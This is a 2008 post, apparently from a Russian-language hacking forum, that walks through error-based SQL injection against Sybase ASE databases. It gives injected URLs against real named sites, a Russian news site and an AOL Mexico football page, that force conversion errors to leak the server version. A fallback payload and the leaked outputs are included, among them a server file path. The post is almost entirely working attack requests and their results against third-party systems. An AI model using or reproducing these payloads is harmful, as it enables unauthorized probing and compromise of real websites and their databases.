10.08.2008, 00:50
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Рассмотрим на конкретном примере
Запрос
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(integer,(select+@@ version))--
Код:
Adaptive Server Enterprise/12.5.3/EBF 13332 ESD#7/P/Linux Intel/Enterprise
Linux/ase1253/1951/32-bit/OPT/Fri Mar 24 00:40:52 2006
если выше метод не действует то:
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(integer,(select+'z '%2bstr(@@version_as_integer)))--
Код:
Warning: sybase_query() [function.sybase-query]: Sybase: Server message: Syntax error during explicit conversion of VARCHAR value 'z 12500' to a INT field. (severity 16, procedure N/A) in /var/home/pda1.vmdaily.ru/classes/db.clss on line 21
12.5.0 - версия Sybase
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(integer,(select+@@vers ion))--
Код:
Adaptive Server Enterprise/12.5.3/EBF 12593 ESD#3/P/Sun_svr4/OS 5.8/
ase1253/1911/64-bit/FBO/Fri Jul 8 13:31:40 2005
|
|
|